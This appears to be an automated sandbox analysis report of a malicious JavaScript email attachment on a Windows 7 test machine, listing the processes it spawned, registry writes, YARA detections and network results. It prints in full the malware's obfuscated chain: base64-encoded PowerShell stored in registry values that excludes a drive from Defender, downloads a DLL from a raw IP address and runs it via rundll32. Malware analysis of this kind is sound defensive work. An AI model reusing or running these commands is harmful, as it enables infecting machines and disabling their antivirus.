Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | March 7, 2023, 9:58 a.m. | March 7, 2023, 10 a.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Attachment-GAKND(28).js
2556-
reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\VicariousPluton /v isatine /d CfCuLyndhuohVhHxOHrXeXrWuuaJOOAcwxwmDjhFeIdivrzKrgukrxouNzGqOujwhqzAoxkutLnKiyVdvADKphHFrTjVxRjpSwIgOUepydHTopBGXHiwNpKGwgxhWLrYEKnppsCAlQsxWIdCapIslWOwbldEMdiPprvvzpWNLqYAxilvFQtyBlfxYrKbHKsOARoIYpjcEkpHRSwFrqHBhiiIKHGPgJANDGJmXETGkrqAubmuTuzZZdYDEwMVZxOjHYImTqWwlSbSgOIksGmrgsWWOtdXjqEMu
2736 -
reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v maliceproof /d AcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
2808 -
reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v Immeritous /d PiiFCMkkXclVXbmwWThiQHRYByeJiwvqfDzjjRQfrrxMxrhOOpuHOUAKGykrqmXvCtXiEWRIhWxCmopITwlPKxzkfiIJLdxlUOALfUsBGPcDqeIilmRbociRsfJEyW
2900 -
reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v physiocratistSexological /d jzgTeLWOUcsqGmuEncfqSiyACQZsRAnUmuNJmgCzyxQeiJHHUIiXJGVYZnDvzstXXjAzkztvvATBNfhwfzMMrJbelMHDSDHXQgnDGgZTKzqqOsGPWdzfcccJdBZlQtFxJxHEFmGlVQlkzKXkscYuksoiUOUHVcfOblElwgBJPxODcHgdgWDCulOsfemhRpDZVUzxAkzdpEjTuIpNeoPnJJsvUlOqfWmHQNBidfIGSAEzywxQZjfoQEWDchRsloLDdfUGOnYhEsjguGYwufydFepUQgOgUCaRdsHSsHWOWibzvmhQIlpKwOUPtPfBFCQqOYlrGlcXUuGPwKGkXUWUqPTeCiNonZEWTvDPVmAnTOFatlxsQeFxXXzaUGCUeJPRCRDiBccAGUpjUKAZHFYyqcxrTKNenNYaxzkeAnKSuflwrSPDtEpxOtTxmZtoDQ
2996 -
reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v epicuticle /d YMuhZoVzcidWxeZuPNTnkynxFHcEegOxrmsBtVSjXxechqdqQLeAiKDMNcFIlSdqZgjWpDTroVjsXSquKpRMTtOIToPucQjhWoIRsHunvHgXbrBWHAWLgBtZPuqYWncoVBczOUNQJrLaRMoewvIjBDgsLGhwYMbtFRmyWWEyGHOjkzUiNaolBvAsUjOhMhiHItrIPpTyMLvTvpPWdPZKawZNzmmMmKqAqKjuxUxxhyGypTkntNSfUmbkhfuDAZVndNxsxDLZevGCWMtdstzjKLRJlugyWGKYcujicpqGVKrBfdkPEcaXCJLHZxZtzIKXlhRwPqxkyLkkYfcHXYTZcbCirjuVpfAREiUxagjLqkOAsIksTIIoCZrRepvOUkILAawfgycNHPVWXEDLbqwrkcAuZWrVsdJUZWuUfrIoVSumAxlrafpMOMqShjofveKLPVcAMfviQzTVv
744 -
reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v SexisyllableCommandos /d AlrexpwMNIxFAedbHwwSzzZHUahyniRudIjrUwHoROxwvSIzzxsBWkGSUJMvsxdWyabHWlHXJQSymtyXbIpHbQpO
2112 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $CondiddlingDeliberatively = Get-ItemProperty -Path HKCU:\SOFTWARE\CondiddlingDeliberatively | %{$_.maliceproof}; powershell -windowstyle Minimized -encodedcommand "JABNAGUAYQBnAGU$CondiddlingDeliberatively"
2220-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
2552-
rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\\voidablenessUnfile.dll RS32
2356
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell $CondiddlingDeliberatively = Get-ItemProperty -Path HKCU:\SOFTWARE\CondiddlingDeliberatively | %{$_.maliceproof}; powershell -windowstyle Minimized -encodedcommand "JABNAGUAYQBnAGU$CondiddlingDeliberatively" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $CondiddlingDeliberatively = Get-ItemProperty -Path HKCU:\SOFTWARE\CondiddlingDeliberatively | %{$_.maliceproof}; powershell -windowstyle Minimized -encodedcommand "JABNAGUAYQBnAGU$CondiddlingDeliberatively" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA= |
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context |
cmdline | reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v physiocratistSexological /d jzgTeLWOUcsqGmuEncfqSiyACQZsRAnUmuNJmgCzyxQeiJHHUIiXJGVYZnDvzstXXjAzkztvvATBNfhwfzMMrJbelMHDSDHXQgnDGgZTKzqqOsGPWdzfcccJdBZlQtFxJxHEFmGlVQlkzKXkscYuksoiUOUHVcfOblElwgBJPxODcHgdgWDCulOsfemhRpDZVUzxAkzdpEjTuIpNeoPnJJsvUlOqfWmHQNBidfIGSAEzywxQZjfoQEWDchRsloLDdfUGOnYhEsjguGYwufydFepUQgOgUCaRdsHSsHWOWibzvmhQIlpKwOUPtPfBFCQqOYlrGlcXUuGPwKGkXUWUqPTeCiNonZEWTvDPVmAnTOFatlxsQeFxXXzaUGCUeJPRCRDiBccAGUpjUKAZHFYyqcxrTKNenNYaxzkeAnKSuflwrSPDtEpxOtTxmZtoDQ |
cmdline | reg add HKCU\SOFTWARE\VicariousPluton /v isatine /d CfCuLyndhuohVhHxOHrXeXrWuuaJOOAcwxwmDjhFeIdivrzKrgukrxouNzGqOujwhqzAoxkutLnKiyVdvADKphHFrTjVxRjpSwIgOUepydHTopBGXHiwNpKGwgxhWLrYEKnppsCAlQsxWIdCapIslWOwbldEMdiPprvvzpWNLqYAxilvFQtyBlfxYrKbHKsOARoIYpjcEkpHRSwFrqHBhiiIKHGPgJANDGJmXETGkrqAubmuTuzZZdYDEwMVZxOjHYImTqWwlSbSgOIksGmrgsWWOtdXjqEMu |
cmdline | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v physiocratistSexological /d jzgTeLWOUcsqGmuEncfqSiyACQZsRAnUmuNJmgCzyxQeiJHHUIiXJGVYZnDvzstXXjAzkztvvATBNfhwfzMMrJbelMHDSDHXQgnDGgZTKzqqOsGPWdzfcccJdBZlQtFxJxHEFmGlVQlkzKXkscYuksoiUOUHVcfOblElwgBJPxODcHgdgWDCulOsfemhRpDZVUzxAkzdpEjTuIpNeoPnJJsvUlOqfWmHQNBidfIGSAEzywxQZjfoQEWDchRsloLDdfUGOnYhEsjguGYwufydFepUQgOgUCaRdsHSsHWOWibzvmhQIlpKwOUPtPfBFCQqOYlrGlcXUuGPwKGkXUWUqPTeCiNonZEWTvDPVmAnTOFatlxsQeFxXXzaUGCUeJPRCRDiBccAGUpjUKAZHFYyqcxrTKNenNYaxzkeAnKSuflwrSPDtEpxOtTxmZtoDQ |
cmdline | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\VicariousPluton /v isatine /d CfCuLyndhuohVhHxOHrXeXrWuuaJOOAcwxwmDjhFeIdivrzKrgukrxouNzGqOujwhqzAoxkutLnKiyVdvADKphHFrTjVxRjpSwIgOUepydHTopBGXHiwNpKGwgxhWLrYEKnppsCAlQsxWIdCapIslWOwbldEMdiPprvvzpWNLqYAxilvFQtyBlfxYrKbHKsOARoIYpjcEkpHRSwFrqHBhiiIKHGPgJANDGJmXETGkrqAubmuTuzZZdYDEwMVZxOjHYImTqWwlSbSgOIksGmrgsWWOtdXjqEMu |
cmdline | reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v SexisyllableCommandos /d AlrexpwMNIxFAedbHwwSzzZHUahyniRudIjrUwHoROxwvSIzzxsBWkGSUJMvsxdWyabHWlHXJQSymtyXbIpHbQpO |
cmdline | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v Immeritous /d PiiFCMkkXclVXbmwWThiQHRYByeJiwvqfDzjjRQfrrxMxrhOOpuHOUAKGykrqmXvCtXiEWRIhWxCmopITwlPKxzkfiIJLdxlUOALfUsBGPcDqeIilmRbociRsfJEyW |
cmdline | reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v maliceproof /d AcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA= |
cmdline | reg add HKCU\SOFTWARE\CondiddlingDeliberatively /v epicuticle /d YMuhZoVzcidWxeZuPNTnkynxFHcEegOxrmsBtVSjXxechqdqQLeAiKDMNcFIlSdqZgjWpDTroVjsXSquKpRMTtOIToPucQjhWoIRsHunvHgXbrBWHAWLgBtZPuqYWncoVBczOUNQJrLaRMoewvIjBDgsLGhwYMbtFRmyWWEyGHOjkzUiNaolBvAsUjOhMhiHItrIPpTyMLvTvpPWdPZKawZNzmmMmKqAqKjuxUxxhyGypTkntNSfUmbkhfuDAZVndNxsxDLZevGCWMtdstzjKLRJlugyWGKYcujicpqGVKrBfdkPEcaXCJLHZxZtzIKXlhRwPqxkyLkkYfcHXYTZcbCirjuVpfAREiUxagjLqkOAsIksTIIoCZrRepvOUkILAawfgycNHPVWXEDLbqwrkcAuZWrVsdJUZWuUfrIoVSumAxlrafpMOMqShjofveKLPVcAMfviQzTVv |
cmdline | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v epicuticle /d YMuhZoVzcidWxeZuPNTnkynxFHcEegOxrmsBtVSjXxechqdqQLeAiKDMNcFIlSdqZgjWpDTroVjsXSquKpRMTtOIToPucQjhWoIRsHunvHgXbrBWHAWLgBtZPuqYWncoVBczOUNQJrLaRMoewvIjBDgsLGhwYMbtFRmyWWEyGHOjkzUiNaolBvAsUjOhMhiHItrIPpTyMLvTvpPWdPZKawZNzmmMmKqAqKjuxUxxhyGypTkntNSfUmbkhfuDAZVndNxsxDLZevGCWMtdstzjKLRJlugyWGKYcujicpqGVKrBfdkPEcaXCJLHZxZtzIKXlhRwPqxkyLkkYfcHXYTZcbCirjuVpfAREiUxagjLqkOAsIksTIIoCZrRepvOUkILAawfgycNHPVWXEDLbqwrkcAuZWrVsdJUZWuUfrIoVSumAxlrafpMOMqShjofveKLPVcAMfviQzTVv |
cmdline | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v SexisyllableCommandos /d AlrexpwMNIxFAedbHwwSzzZHUahyniRudIjrUwHoROxwvSIzzxsBWkGSUJMvsxdWyabHWlHXJQSymtyXbIpHbQpO |
cmdline | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\CondiddlingDeliberatively /v maliceproof /d AcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQBy